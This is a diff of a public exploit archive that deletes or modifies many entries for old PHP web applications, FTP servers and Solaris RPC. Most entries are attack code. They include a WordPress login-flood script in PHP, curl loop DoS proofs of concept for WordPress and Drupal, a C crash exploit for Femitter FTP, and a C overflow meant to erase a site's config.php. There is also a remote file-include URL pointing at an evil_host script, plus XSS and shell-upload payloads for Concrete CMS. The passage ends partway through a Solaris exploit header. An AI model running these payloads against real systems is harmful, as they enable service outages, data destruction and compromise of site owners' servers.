- -Reportedly, submitting a specially crafted URL will successfully remove user accounts. - -It should be noted that known usernames of the system is required. - - -http://www.host.com/supp_membre.php?choix_membre_supp=polom \ No newline at end of file diff --git a/platforms/php/webapps/22110.txt b/platforms/php/webapps/22110.txt deleted file mode 100755 index d8423d6b9..000000000 --- a/platforms/php/webapps/22110.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/6465/info - -A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters. - -An attacker can exploit this vulnerability by modifying certain parameters when making a request for the modules.php script. This will prevent visitors to the site hosting PHP-Nuke from creating a new account thereby leading to a denial of service vulnerability. - -http://target.com/modules.php?name=Your_Account&op=userinfo&uname= \ No newline at end of file diff --git a/platforms/php/webapps/22494.txt b/platforms/php/webapps/22494.txt deleted file mode 100755 index baae98c07..000000000 --- a/platforms/php/webapps/22494.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/7351/info - -It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition. - -It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected. - -product_info.php?products_id=[large amount of random content] \ No newline at end of file diff --git a/platforms/php/webapps/22660.txt b/platforms/php/webapps/22660.txt deleted file mode 100755 index b4fa0da52..000000000 --- a/platforms/php/webapps/22660.txt +++ /dev/null @@ -1,6 +0,0 @@ -source: http://www.securityfocus.com/bid/7702/info - -some submissions to the rating system. Because of this, a remote attacker may be able to submit a string that causes a denial of service to legitmate users. - - -http://www.example.com/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] \ No newline at end of file diff --git a/platforms/php/webapps/23311.txt b/platforms/php/webapps/23311.txt deleted file mode 100755 index b6986ff64..000000000 --- a/platforms/php/webapps/23311.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/8930/info - -It has been reported that E107 may be prone to a denial of service vulnerability. The issue has been reported to exist due to improper handling of user-supplied data in the form of HTML or script code to the 'Name:' field of Chatbox.php script. This issue may cause the software to behave in an unstable manner leading to a crash. - -Successful exploitation of this issue may allow an attacker to cause the software to crash or hang. - -It should be noted that although this vulnerability has been reported to affect E107 versions 0.545 and 0.603, other versions might also be affected. - -In the Name inputbox of the Chatbox type: - - \ No newline at end of file diff --git a/platforms/php/webapps/29874.txt b/platforms/php/webapps/29874.txt deleted file mode 100755 index 810bbef17..000000000 --- a/platforms/php/webapps/29874.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/23580/info - -PHP Turbulence is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. - -Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. - -This issue affects PHP Turbulence 0.0.1 alpha; other versions may also be affected. - -http://www.example.com/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt? \ No newline at end of file diff --git a/platforms/php/webapps/29980.txt b/platforms/php/webapps/29980.txt deleted file mode 100755 index ea852b0f1..000000000 --- a/platforms/php/webapps/29980.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/23874/info - -Campsite is prone to multiple remote file-include vulnerabilities. - -Exploiting this issue allows remote attackers to execute code in the context of the webserver. - -This issue affects Campsite 2.6.1. Earlier versions may also be affected. - -http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/29987.txt b/platforms/php/webapps/29987.txt deleted file mode 100755 index 2e806cafe..000000000 --- a/platforms/php/webapps/29987.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/23874/info - -Campsite is prone to multiple remote file-include vulnerabilities. - -Exploiting this issue allows remote attackers to execute code in the context of the webserver. - -This issue affects Campsite 2.6.1. Earlier versions may also be affected. - -http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/30753.txt b/platforms/php/webapps/30753.txt deleted file mode 100755 index ff80a3ab7..000000000 --- a/platforms/php/webapps/30753.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/26410/info - -AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. - -Successfully exploiting this issue allows remote attackers to consume excessive CPU resources, potentially denying service to legitimate users. - -AutoIndex PHP Script 2.2.2 and 2.2.3 are vulnerable to this issue; prior versions may also be affected. - -http://www.example.com/AutoIndex/index.php?dir=%00 \ No newline at end of file diff --git a/platforms/php/webapps/34505.txt b/platforms/php/webapps/34505.txt deleted file mode 100755 index 562a10a3e..000000000 --- a/platforms/php/webapps/34505.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/42598/info - -MySQL is prone to a denial-of-service vulnerability. - -An attacker can exploit these issues to crash the database, denying access to legitimate users. - -This issues affect versions prior to MySQL 5.1.49. - -NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. - -mysql> SET storage_engine=MYISAM; - -mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT IF( NULL IS NOT NULL, NULL -, NULL) ; drop table mk_upgrade; diff --git a/platforms/php/webapps/35413.php b/platforms/php/webapps/35413.php deleted file mode 100755 index 74595ec5c..000000000 --- a/platforms/php/webapps/35413.php +++ /dev/null @@ -1,67 +0,0 @@ - $argv[2], - 'pwd' => str_repeat("A",1000000), - 'redirect_to' => $argv[1] . "/wp-admin/", - 'reauth' => 1, - 'testcookie' => '1', - 'wp-submit' => "Log%20In"); - - $cookieFiles = "cookie.txt"; - - curl_setopt_array($ch, array( - CURLOPT_HEADER => 1, - CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6", - CURLOPT_REFERER => $argv[1] . "/wp-admin/", - CURLOPT_COOKIEJAR => $cookieFiles, - CURLOPT_COOKIESESSION => true, - CURLOPT_URL => $argv[1] . '/wp-login.php', - CURLOPT_RETURNTRANSFER => true, - CURLOPT_POST => true, - CURLOPT_POSTFIELDS => $postData, - CURLOPT_FOLLOWLOCATION => true)); - - curl_multi_add_handle($multi, $ch); - - $channels[$x] = $ch; -} - -$active = null; - -do { - $mrc = curl_multi_exec($multi, $active); -} while ($mrc == CURLM_CALL_MULTI_PERFORM); - -while ($active && $mrc == CURLM_OK) { - do { - - $mrc = curl_multi_exec($multi, $active); - } while ($mrc == CURLM_CALL_MULTI_PERFORM); -} - -foreach ($channels as $channel) { - curl_multi_remove_handle($multi, $channel); -} - -curl_multi_close($multi); -echo "."; -} while (1==1); - -?> - diff --git a/platforms/php/webapps/35414.txt b/platforms/php/webapps/35414.txt deleted file mode 100755 index ad3cbcdc0..000000000 --- a/platforms/php/webapps/35414.txt +++ /dev/null @@ -1,52 +0,0 @@ -==================================================================== -DESCRIPTION: -==================================================================== -A vulnerability present in Wordpress < 4.0.1 allows an -attacker to send specially crafted requests resulting in CPU and memory -exhaustion. This may lead to the site becoming unavailable or -unresponsive (denial of service). - -==================================================================== -Time Line: -==================================================================== - -November 20, 2014 - A Wordpress security update and the security -advisory is published. - -==================================================================== -Proof of Concept: -==================================================================== -Generate a pyaload and try with a valid user: - -echo -n "name=admin&pass=" > valid_user_payload && printf "%s" -{1..1000000} >> valid_user_payload && echo -n "&op=Log -in&form_id=user_login" >> valid_user_payload - -Perform a Dos with a valid user: - -for i in `seq 1 150`; do (curl --data @valid_user_payload -http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep -0.25; done - -==================================================================== -Authors: -==================================================================== - --- Javer Nieto -- http://www.behindthefirewalls.com --- Andres Rojas -- http://www.devconsole.info - -==================================================================== -References: -==================================================================== - -* https://wordpress.org/news/2014/11/wordpress-4-0-1/ - -* https://www.drupal.org/SA-CORE-2014-006 - -* -http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html - -* -http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html - -* http://www.devconsole.info/?p=1050 diff --git a/platforms/php/webapps/35415.txt b/platforms/php/webapps/35415.txt deleted file mode 100755 index 18b051111..000000000 --- a/platforms/php/webapps/35415.txt +++ /dev/null @@ -1,53 +0,0 @@ -==================================================================== -DESCRIPTION: -==================================================================== -A vulnerability present in Drupal < 7.34 allows an attacker to send -specially crafted requests resulting in CPU and memory exhaustion. This -may lead to the site becoming unavailable or unresponsive (denial of -service). - -==================================================================== -Time Line: -==================================================================== - -November 19, 2014 - A Drupal security update and the security advisory -is published. - -==================================================================== -Proof of Concept: -==================================================================== - -Generate a pyaload and try with a valid user: - -echo -n "name=admin&pass=" > valid_user_payload && printf "%s" -{1..1000000} >> valid_user_payload && echo -n "&op=Log -in&form_id=user_login" >> valid_user_payload - -Perform a Dos with a valid user: - -for i in `seq 1 150`; do (curl --data @valid_user_payload -http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done - - -==================================================================== -Authors: -==================================================================== - --- Javer Nieto -- http://www.behindthefirewalls.com --- Andres Rojas -- http://www.devconsole.info - -==================================================================== -References: -==================================================================== - -* https://wordpress.org/news/2014/11/wordpress-4-0-1/ - -* https://www.drupal.org/SA-CORE-2014-006 - -* -http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html - -* -http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html - -* http://www.devconsole.info/?p=1050 diff --git a/platforms/php/webapps/37225.pl b/platforms/php/webapps/37225.pl index 6473e6926..889e04059 100755 --- a/platforms/php/webapps/37225.pl +++ b/platforms/php/webapps/37225.pl @@ -12,6 +12,76 @@ An attacker may leverage these issues to cause denial-of-service conditions or t Concrete CMS versions 5.5 and 5.5.21 are vulnerable. + + + + +Cross Site Scripting: + +1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="> + +2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=">&searchInstance=file1337335625 + +3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="> +3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="> +www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="> + +4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= + +4A)(without onmouseover event) +http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=">&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]= + +5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="> + +6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');&fID=7 +&fid=VALID_ID_OF_IAMGE + +7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance=">&fID=owned + +8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance=">&fID=4 + +9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="> +&fid=VALID_ID_OF_IAMGE + +10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance=">&fID=owned + +11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=">&node=owned&display_mode=full&select_mode=&selectedPageID= + +11A) +http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=">&display_mode=full&select_mode=&selectedPageID= + +11B) +http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=">&select_mode=&selectedPageID= + +11C) +http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="> + +11D) +http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=">&selectedPageID=owned +(All parameters goes to page source without any sanitization +validation) + +12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID=">&search=1 + +13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="> + + + +Shell upload: + +#### p0c 1 [ Upload File via FlashUploader ] ###==> + +http://www.example.com/concrete/flash/thumbnail_editor_2.swf +http://www.example.com/concrete/flash/thumbnail_editor_3.swf +http://www.example.com/concrete/flash/swfupload/swfupload.swf +http://www.example.com/concrete/flash/uploader/uploader.swf + +# Upload File/Shell Inj3ct0r.php;.gif + + + + +DOS: + #### p0c 2 [ DDos with RPC 'using simple PERL script]===> #!/usr/bin/perl diff --git a/platforms/php/webapps/6481.c b/platforms/php/webapps/6481.c deleted file mode 100755 index a1b000147..000000000 --- a/platforms/php/webapps/6481.c +++ /dev/null @@ -1,184 +0,0 @@ -/*0-----------------------------------------------------------------------------------0*\ -0 0 -| | -| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC | -| | -| Summary: Femitter Server is an easy-to use HTTP and FTP server application | -| for Windows which allows you to use your own computer for sharing gigabytes | -| of files with your friends and colleagues. | -| | -| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability | -| and memory corruption that causes the application to crash. When we send to | -| the RETR command an argument like AAAA:AAAA or an overly long string of As | -| (1024), the server crashes instantly. Also, when typing into browser: | -| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), | -| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at | -| address 004A218A in module "fem.exe". Write of address 00000000. | -| | -| Producst web page: http://acritum.com/fem/index.htm | -| | -| Tested on Microsoft Windows XP SP2 (English) | -| | -| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic | -| | -| liquidworm [t00t] gmail.com | -| | -| http://www.zeroscience.org/ | -| | -| 17.09.2008 | -| | -0 0 -\*0-----------------------------------------------------------------------------------0*/ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA" - - -void header(void); - - -int main (int argc, char *argv[]) -{ - - - int sckt = 0, sfd = 0; - char user[] = "USER admin\r\n"; - char pass[] = "PASS nimda\r\n"; - - unsigned char payload[]= - - "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\xD\xA"; - - header(); - - if(argc != 3) - { - printf("\nUsage: %s [ip] [port]\n\n", argv[0]); - return (EXIT_SUCCESS); - } - - struct sockaddr_in dos_ftp; - sfd = socket(AF_INET, SOCK_STREAM, 0); - if(sfd < 0) - { - perror("Socket"); - printf("Error creating socket...\n"); - return(1); - } - - printf("\n\n[+] Socket created!\n"); - sleep (1); - - memset(&dos_ftp, 0x0, sizeof(dos_ftp)); - dos_ftp.sin_family = AF_INET; - dos_ftp.sin_addr.s_addr = inet_addr(argv[1]); - dos_ftp.sin_port = htons(atoi(argv[2])); - sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp)); - if(sckt < 0) - { - perror("Connect"); - printf("Error connecting...\n"); - return(1); - } - - printf("[+] Connection established!\n"); - sleep (1); - - write(sfd, user, strlen(user)); // username - printf("[+] Sending CMD: %s\n", user); - sleep (2); - - write(sfd, pass, strlen(pass)); // password - printf("[+] Sending CMD: %s\n", pass); - sleep (2); - - printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]); - sleep(2); - - send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0); - printf("[+] Malicious buffer succesfully sent...\n"); - sleep (1); - printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]); - - close (sfd); - - return(0); -} - -void header() -{ - printf("\n********************************************************************************\n\n"); - printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n"); - printf("\t\t\tby LiquidWorm \n\n"); - printf("********************************************************************************\n\n"); -} - -// milw0rm.com [2008-09-17] diff --git a/platforms/php/webapps/738.c b/platforms/php/webapps/738.c deleted file mode 100755 index eb0755708..000000000 --- a/platforms/php/webapps/738.c +++ /dev/null @@ -1,95 +0,0 @@ -/* - iwebnegar 1.1 remote exploit - c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com - bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein ) - compile with Ms visual C++ (the php version written by the bug finder but still priv8) - greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com , - Jamie & Ben from exploitdev . - Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? ) - */ - /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will - go to Die() functions which cause the erase of config.php - */ -#include -#include -#include -#include -#pragma comment(lib, "ws2_32.lib") -#define size 300 - - - -int main (int argc, char *argv[]){ - - - - char req[] = - "GET /admin/conf_edit.php?"; - unsigned int rc,addr,sock ; - struct sockaddr_in tcp; - struct hostent * hp; - WSADATA wsaData; -char buffer[size]; - - memset(buffer,'A',300); - memcpy(buffer,req,25); - - if(argc < 2) { - printf("\nusage : iwebnegar host\n"); - printf("example : iwebnegar.exe 127.0.0.1\n"); - exit(-1) ; - } - - if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ - printf("WSAStartup failed !\n"); - exit(-1); - } - hp = gethostbyname(argv[1]); - if (!hp){ - addr = inet_addr(argv[1]); - } - if ((!hp) && (addr == INADDR_NONE) ){ - printf("Unable to resolve %s\n",argv[1]); - exit(-1); - } - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("socket() error...\n"); - exit(-1); - } - if (hp != NULL) - memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); - else - tcp.sin_addr.s_addr = addr; - - if (hp) - tcp.sin_family = hp->h_addrtype; - else - tcp.sin_family = AF_INET; - - tcp.sin_port=htons(80); - - printf("\n[+] attacking host %s\n" , argv[1]) ; - printf("[+] Building overflow string\n"); - Sleep(1000); - printf("[+] packet size = %d byte\n" , sizeof(buffer)); - rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); - if(rc==0) - { - - Sleep(1000) ; - printf("[+] connected\n") ; - - send(sock , buffer , sizeof(buffer) , 0); - - printf("[+] see if the config.php erased ! \n\n") ; - - } - else { - printf("the 80 port is not open try another webserver port\n"); - - - } -} - -// milw0rm.com [2005-01-04] diff --git a/platforms/php/webapps/7540.txt b/platforms/php/webapps/7540.txt index 852e70455..fba40b982 100755 --- a/platforms/php/webapps/7540.txt +++ b/platforms/php/webapps/7540.txt @@ -1,17 +1,17 @@ -PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability. -Home: http://black-dwarf.com -HS: http://www.hotscripts.com/Detailed/86225.html -Found by: Anarchy Angel - http://hha.zapto.org - -Temp XSS: http://site.com/phpg/index.php?url="> [XSS] - -Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS] - -Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg
-As long as the img/vid file does not exist you will get file path. - -Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file. - -DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing. - -# milw0rm.com [2008-12-21] +PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability. +Home: http://black-dwarf.com +HS: http://www.hotscripts.com/Detailed/86225.html +Found by: Anarchy Angel - http://hha.zapto.org + +Temp XSS: http://site.com/phpg/index.php?url="> [XSS] + +Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS] + +Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg
+As long as the img/vid file does not exist you will get file path. + +Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file. + +DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing. + +# milw0rm.com [2008-12-21] diff --git a/platforms/php/webapps/7838.txt b/platforms/php/webapps/7838.txt index 6fcb916a7..53064d95c 100755 --- a/platforms/php/webapps/7838.txt +++ b/platforms/php/webapps/7838.txt @@ -1,12 +1,12 @@ -############################################## -# Dodo's Quiz Script Local File Inclusion Vulnerability -############################################## -[+] Author : Stack-Terrorist -[+] v4-team.com -============================================== -Script : Dodo's Quiz Script -################################################# -Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile] -################################################# - -# milw0rm.com [2009-01-20] +############################################## +# Dodo's Quiz Script Local File Inclusion Vulnerability +############################################## +[+] Author : Stack-Terrorist +[+] v4-team.com +============================================== +Script : Dodo's Quiz Script +################################################# +Exploit : http://localsite/path/dodosquiz.php?n=[LocalFile] +################################################# + +# milw0rm.com [2009-01-20] diff --git a/platforms/solaris/remote/19635.c b/platforms/solaris/remote/19635.c deleted file mode 100755 index 9dfd2b43e..000000000 --- a/platforms/solaris/remote/19635.c +++ /dev/null @@ -1,286 +0,0 @@ -source: http://www.securityfocus.com/bid/811/info - -It is possible to crash rpc.ttdbserver by using the old tddbserver buffer overflow exploit. This problem is caused by a NULL pointer being dereferenced when rpc function 15 is called with garbage. You cannot make rpc.ttdbserver execute arbitrary code with this vulnerability. The consequence of this vulnerability being exploited is a denial of service condition (rpc.ttdbserver). - -/* - rpc.ttdbserver remote overflow, apk - Solaris (tested on SS5 and Ultra 2.5.1) - Irix (tested on r5k and r10k O2 6.3), - HP-UX ( tested on 700s 10.20) - - usage: ./r [-ku] [-p port] [-f outfile] host cmd - -k : kill ttdbserver (read below) - -u : use UDP (default TCP) - -p port : connect to ttdbserver at port (don't ask portmap) - -f outfile : store rpc message in outfile (and do NOT contact host) - - note: - it should compile on any normal 